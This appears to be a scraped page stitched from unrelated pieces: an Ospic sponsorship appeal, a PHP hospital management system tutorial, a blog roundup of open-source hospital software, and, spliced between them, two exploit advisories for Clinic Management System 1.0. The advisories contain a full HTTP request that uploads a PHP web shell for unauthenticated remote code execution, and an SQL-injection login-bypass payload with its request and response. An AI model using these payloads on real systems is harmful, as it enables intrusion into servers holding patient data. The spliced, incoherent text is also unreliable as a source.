Open source hospital management system in php
Who are we ?
Ospic is a startup organization founded and currently located in Dar es Salaam, Tanzania and it’s main focus is to provide an open source softwares solutions to global healthy industy e.g Hospital management systems (HMS), Pharmacy management systems etc.
What are we working on ?
Currently we are working on main three four active projects i.e:-
- Application platform which is currently hosted in Heroku and we are working out to move it to our new domain.
- Hospital management system web application as UI for data management.
- Self service mobile application. For client/patient to keep track of their health infomations i.e Costs, bills. consultations, medical insurances, medical reports etc
- A documentation blog for the above mentioned hospital management system.
Why is sponsorship important? How will we use the funds?
Ref: as written in our project README Ospic seems the health system is one of essential socio-economic activities; therefore, it requires rational and effective management. And more important health datas are for us human beings so the clarity of this data’s implies clarity of our healthy history hence need good means of collection. So sponsor Ospic so we can assure security and clarity of health datas any time they are required.
Though we are trying to move faster as we can but our budget keep dragging us back. Sponsoring will help us with maily three important goal
- Hire best developers and contributors to keep this project move faster and accommodate the global market.
- Pay for our demo servers and provide cheap or free hosting subscription for health institutions which in one way or another can not afford to pay for their own servers and have few datas.
- Provide a best customer services physically or remotelly whatever it is neeed.
The aim is to provide a best helth software solution for the global market with affordable costs for both developed and third world countries.
# Exploit Title: Clinic Management System 1.0 - Unauthenticated Remote Code Execution # Google Dork: N/A # Date: 2020-06-02 # Exploit Author: BKpatron # Vendor Homepage: https://www.sourcecodester.com/php/14243/open-source-clinic-management-system-php-full-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/Nikhil_B/clinic-full-source-code-with-database_0.zip # Version: v1.0 # Tested on: Win 10 # CVE: N/A # Vulnerability: Clinic Management System version 1.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file. # vulnerable file : manage_website.php # Details: login to website as patient then access the 'localhost/source%20code/manage_website.php' page, as it does not check for an admin user. change website logo and upload your malicious php file(<?php echo shell_exec($_GET["cmd"]); ?>). if you see this message "Something Went Wrong" You have successfully uploaded the malicious php file. path of your file: http://localhost/source%20code/uploadImage/Logo/your_file.php # Proof of Concept: http://localhost/source%20code/manage_website.php POST /source%20code/manage_website.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------135192786613366 Content-Length: 2539 Referer: http://localhost/source%20code/manage_website.php Cookie: PHPSESSID=qdh5f7kelhhe9uvafveafit5e1 Connection: keep-alive Upgrade-Insecure-Requests: 1 -----------------------------58631544014332: undefined Content-Disposition: form-data; name="title" -----------------------------58631544014332 Content-Disposition: form-data; name="short_title" -----------------------------58631544014332 Content-Disposition: form-data; name="footer" -----------------------------58631544014332 Content-Disposition: form-data; name="currency_code" -----------------------------58631544014332 Content-Disposition: form-data; name="currency_symbol" -----------------------------58631544014332 Content-Disposition: form-data; name="old_website_image" logo for hospital system.jpg -----------------------------58631544014332 Content-Disposition: form-data; name="website_image"; filename="shell.php" Content-Type: application/octet-stream <?php echo shell_exec($_GET["cmd"]); ?>
Hospital Management System Introduction
Hospital Management System In PHP is web baes application.
The project Hospital Management system includes registration of patients, storing their details into the system. The software has the facility to give a unique id for every patient and stores the details of every patient.
The Hospital Management System can be entered using a username and password. It is accessible either by an administrator .Only they can add data into the database. The data can be retrieved easily. The interface is very user-friendly. The data are well protected for personal use and make the data processing very fast.
Hospital Management System is a web application for the hospital which manages doctors and patients. In this project, we use PHP and MySQL database.
The entire project mainly consists of 3 modules, which are
- Admin module
- User module
- Doctor module
- Dashboard: In this section, admin can view the Patients, Doctors, Appointments and New queries.
- Doctors: In this section, admin can add doctor’s specialization and mange doctors (Add/Update).
- Users: In this section, admin can view users detail(who take online appointment) and also have right to delete irrelevant user.
- Patients: In this section, admin can view patient’s details.
- Appointment History: In this section, admin can view appointment history.
- Contact us Queries: In this section, admin can view queries which are send by users.
- Doctor Session Logs: In this section, admin can see login and logout time of doctor.
- User Session Logs: In this section, admin can see login and logout time of user.
- Reports: In this section, admin can view reports of patients in particular periods.
- Patient Search: In this section, admin can search patient with the help of patient name and mobile number.
Admin can also change his/her own password.
User module (patient):
- Dashboard: In this section, patients can view the his/her profile, Appointments and Book Appointment.
- Book Appointment: In this section, Patient can book his/her appointment.
- Appointment History: In this section, Patients can see his/her own appointment history.
- Medical History: In this section, Patients can see his/her own appointment history.
User can update his/her profile, change the password and recover the password.
- Dashboard: In this section, doctor can view his/her own profile and online appointments.
- Appointment History: In this section, Doctor can see patient’s appointment history.
- Patients: In this section, doctor can manage patients (Add/Update).
- Search: In this section, doctor can search patient with the help of patient name and mobile number.
Doctor can also update his profile, change the password and recover the password.
Project Output Screens
Patient Medical History
How to run the Hospital Management System (HMS) Project
1. Download the zip file
2. Extract the file and copy hospital folder
3.Paste inside root directory(for xampp xampp/htdocs, for wamp wamp/www, for lamp var/www/html)
4. Open PHPMyAdmin (http://localhost/phpmyadmin)
5. Create a database with name hms
6. Import hms.sql file(given inside the zip package in SQL file folder)
7.Run the script http://localhost/hospital (frontend)
Login Details for admin : admin/[email protected]
Login Details for Patient: [email protected]/[email protected]
Login Details for Doctor: [email protected]/[email protected]
Disclaimer : This project is not for Commercial use.
Project Download Link
Download Source Code
Hospital Management System Project Report and PPT
Download Hospital Management System Report and PPT in Rs 199 / $3
# Exploit Title: Clinic Management System 1.0 - Authentication Bypass # Google Dork: N/A # Date: 2020-06-02 # Exploit Author: BKpatron # Vendor Homepage: https://www.sourcecodester.com/php/14243/open-source-clinic-management-system-php-full-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/Nikhil_B/clinic-full-source-code-with-database_0.zip # Version: v1.0 # Tested on: Win 10 # CVE: N/A # my website: bkpatron.com # Vulnerability: Attacker can bypass login page and access to dashboard page # vulnerable file : login.php # Parameter & Payload: '=''or' # Proof of Concept: http://localhost/source%20code/login.php POST /source%20code/login.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 72 Referer: http://localhost/source%20code/login.php Cookie: PHPSESSID=qdh5f7kelhhe9uvafveafit5e1 Connection: keep-alive Upgrade-Insecure-Requests: 1 user=admin&email=%27%3D%27%27or%27&password=%27%3D%27%27or%27&btn_login=: undefined HTTP/1.1 200 OK Date: Mon, 01 Jun 2020 19:52:17 GMT Server: Apache/2.4.39 (Win64) PHP/7.2.18 X-Powered-By: PHP/7.2.18 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 4726 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Schedule medical services using a corporate-level hospital management system. These open-source software are designed on scalable architecture and tech stack.
In our previous blog posts, we wrote on different topics that include How Online Healthcare Software Empowers Healthcare Industry, Features Exploration Of Medical Health Solution OpenEMR, and an article on How To Set Up eHealth System Hospitalrun On. In this modern age of technology, the healthcare department seriously depends on technology. Revolution in software development and the internet of things have brought massive support to the medical sector in terms of efficiency, robustness, and transparency.
Fortunately, there are many Open Source hospital management projects that help healthcare officials to manage medical practices and resources to provide better healthcare services. These healthcare information systems offer seamless integrations with third-party applications such as labs, and clinics. Moreover, there are provisions to automate repetitive tasks and processes such as patient registration, appointment scheduling, billing management, and drugs management. In this blog post, we will go through some of the following most used patient health record software.
OpenEMR is an open source hospital information system for managing health records. It is multilingual and offers many features such as e-Prescribing, billing management, and many more. Further, this healthcare IT solution is intelligent enough to provide remote health facilities. This hospital management system offers data encryption to make sure data security and comes up with role based menu that is fully customizable. OmerEMR is multilingual, extensible, and provides an integrated billing system. Moreover, it provides a user-friendly interface where users can generate customized reports. OpenEMR is written in PHP and comes with all the documentation regarding development and development. Therefore, all the source code is available at Github.
OpenEMR offers the following key points:
- Schedule Patients Appointments
- Data Encryption
- Lab Integration
Learn more about OpenEMR
OpenMRS is open source adaptable patient record management software. This web-based healthcare solution provides powerful modules such as embedded patient workflows, location-based login, and multiple identifiers. OpenMRS is built on top of modular architecture, is multilingual, and offers support for many languages. Moreover, this health record management system has a strong community that has been consistently working to develop further modules and plugins. Above all, this open source electronic healthcare system offers a RESTful interface for third-party applications. This open source medical software is written in Java and all documentation is available. Therefore, its source code is available at Github.
OpenMRS comes up with the following key features:
- Patient’s Registration Module
- Modular Architecture
- Role-based Permissions
- Dictionary Interface
Learn more about OpenMRS
Hospitalrun offers the following important features:
- Customized Billing System
- Appointment Scheduling
- Electronic Medical Records
- Users Management
Learn more about Hospitalrun
Open Hospital is a free hospital management system with multiple features to automate hospitalizations, patient visits, laboratory data, treatment history, and other smooth integration features. In addition, it is easy to set up on local/cloud servers and offers REST API to integrate with other third-party applications. Moreover, there is a module that allows users to manage laboratory data in this hospital management project. This open source medical software is multilingual and can be modified as per needed functionalities. Open Hospital lets healthcare officials tp automate the patient submission and patient visits. Further, Open Hospital is written in Java and comprehensive documentation regarding development is available. Therefore, you can find its source code at Github.
Open Hospital has the following key features:
- Vaccine Database
- Patient’s Submission
- REST API
- Billing Management
Learn more about Open Hospital
Solismed is open source outpatient and inpatient management system for the medical industry. This electronic healthcare system is secure, scalable, and offers many rich features such as lab integration, appointment reminders, and some more. Further, it lets its users configure the routine tasks just from the user interface. Solismed comes up with self-hosting capabilities. This open source medical software provides drug management and robust billing services. It is written in PHP and all documentation is available. Therefore, its source code is available at this link along with all the development and deployment details.
Following are the prominent features:
- Patient Demographics
- Medical Billing Service
- Patient Portal
- Drug Stock Control
- Appointment Scheduling
Learn more about Solismed
This brings an end to this blog post. There are several things to consider before choosing the right patient health record software. In fact, with a huge increase in population, the hospital management system is a must-have component to manage and deliver high intensity processes. In this blog post, we have gone through some popular hospital management projects and explored their features. Therefore, this article will surely help you in making the right choice if you are looking to deploy a healthcare information system for your business. Open source community is actively developing open source medical software to meet the healthcare needs on a larger scale. There are many other open source options that you can find in the explore section below.
Finally, containerize.com is intended to write articles on further open source products. Therefore, please stay in touch with this healthcare technologies category for the latest updates.
Relevant Product Pages
You may find the following links relevant: